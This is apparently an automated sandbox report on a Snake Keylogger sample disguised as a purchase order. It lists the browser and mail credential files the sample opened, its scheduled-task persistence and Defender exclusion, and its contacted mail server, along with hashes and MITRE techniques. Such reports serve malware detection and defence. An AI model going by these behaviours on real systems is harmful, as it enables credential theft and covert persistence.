                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Users\user\AppData\Roaming\FNOqSQ.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.2c07308.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.52b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.52b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.2c07308.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini

                    Remote Access Functionality

                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.2c07308.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.52b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.52b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 7.2.FNOqSQ.exe.2c07308.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                    | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 23 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                    | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                    Behavior Graph (figure not reproduced): ID: 1409106, Sample: PUK ITALIA PO 120610549.EXE.exe, Startdate: 14/03/2024, Architecture: WINDOWS, Score: 100

                    • DNS/IP (analysis level): mail.alltoursegypt.com; api.ipify.org; alltoursegypt.com
                    • Signatures (analysis level): Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 11 other signatures
                    • Process: PUK ITALIA PO 120610549.EXE.exe (started)
                        DNS/IP: alltoursegypt.com 192.254.186.165, 49733, 49736, 587 UNIFIEDLAYER-AS-1US United States
                        DNS/IP: api.ipify.org 104.26.12.205, 443, 49732 CLOUDFLARENETUS United States
                        Dropped: C:\Users\user\AppData\Roaming\FNOqSQ.exe, PE32
                        Dropped: C:\Users\user\AppData\Local\...\tmpEADA.tmp, XML
                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Adds a directory exclusion to Windows Defender; Installs a global keyboard hook
                        Started: powershell.exe, which started WmiPrvSE.exe and conhost.exe
                        Started: schtasks.exe, which started conhost.exe
                    • Process: FNOqSQ.exe (started)
                        Signatures: Multi AV Scanner detection for dropped file

| Source | Detection | Scanner | Label | Link |
| PUK ITALIA PO 120610549.EXE.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger | |

| Source | Detection | Scanner | Label | Link |
| C:\Users\user\AppData\Roaming\FNOqSQ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger | |
                    No Antivirus matches
                    No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| api.ipify.org | 104.26.12.205 | true | false | | high |
| alltoursegypt.com | 192.254.186.165 | true | false | | unknown |
| mail.alltoursegypt.com | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
| https://api.ipify.org/ | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| 104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false |
| 192.254.186.165 | alltoursegypt.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1409106
                                                      Start date and time:2024-03-14 17:28:08 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 15s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:PUK ITALIA PO 120610549.EXE.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@9/9@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 203
                                                      • Number of non-executed functions: 21
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • VT rate limit hit for: PUK ITALIA PO 120610549.EXE.exe
| Time | Type | Description |
| 16:28:59 | Task Scheduler | Run new task: FNOqSQ path: C:\Users\user\AppData\Roaming\FNOqSQ.exe |
| 17:28:56 | API Interceptor | 7733906x Sleep call for process: PUK ITALIA PO 120610549.EXE.exe modified |
| 17:28:58 | API Interceptor | 14x Sleep call for process: powershell.exe modified |
| 17:29:00 | API Interceptor | 1x Sleep call for process: FNOqSQ.exe modified |
                                                      No context
                                                      Process:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.380805901110357
                                                      Encrypted:false
                                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:lGLHyIFKL3IZ2KRH9Ougos
                                                      MD5:F84E6CDD505CFBCB0494097AFA246090
                                                      SHA1:53F24F126D2E680CCABE29CFD47BE33B1D41E994
                                                      SHA-256:0697545568ECEF0194E6EBA21C31AD3297E226DF4B4AFCD8AD77223CB3D08887
                                                      SHA-512:5B8F240E4251B7C8B1F5623E76462AB02A13141E5141D9BBA3EBC95169EE9C28958FD1DCA7D9FF5D7FD30207E5457297C1C291DF3DD215EAA7FFE922A1DCF49D
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1572
                                                      Entropy (8bit):5.114928064253325
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaRxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
                                                      MD5:87A79526FD6CB18E3C5266FFD7E278B9
                                                      SHA1:60ED5F3809B6B78342E40A543586D6AA4E3F28A4
                                                      SHA-256:19DE306359FDC90B31EC70B8B779E8998EE41C538C69BF997011BF98FAAD2A92
                                                      SHA-512:2D229C438FD382508175D7ADF9C481CF1A76FFA2648710DFE739D081A6742889A9F5488B281281C75DC3D862E25840BA79F553DC2F1F581072D33D602CBA21F2
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):666112
                                                      Entropy (8bit):7.9848095460234
                                                      Encrypted:false
                                                      SSDEEP:12288:gsJTENl3a+1+UxRhsZzc3LKEUfzPdvpkF55CSuGxCkckJ+ZWsfeXjZ:BxENllxzsZzALKxuHuG7JYWsWXjZ
                                                      MD5:876BDD759D990110A2BBD617B0F2C549
                                                      SHA1:DEC55C0273518038E0F2CDABE94D0D33E6FB1704
                                                      SHA-256:066BEB79D6FC244E4FC3DB3CAE1AF40749798A52F6B5796F14E3612E1498BF73
                                                      SHA-512:B3F8F1D0CC8A743E907877E699FEDF08FE0482AED2D7902A93497D773978BF01D0E78A81341DCD5A6FF0019CFDF43F1CD68D7952DC9F853B2DD2EECC471A23B6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&}...............0.............n7... ...@....@.. ....................................@..................................7..O....@.......................`.......(..p............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................P7......H........5... ..........LV...............................................0...........(,....+..*..0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(-....+....+..*..0.................,...(.....+....+..*...0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(/....+....+..*".(.....*..r...p..*...%..^.(....}......}.....(.......(.....*..0...........(......{.....o.....*....0..n........s)......{....o....o ......{
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.9848095460234
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:PUK ITALIA PO 120610549.EXE.exe
                                                      File size:666'112 bytes
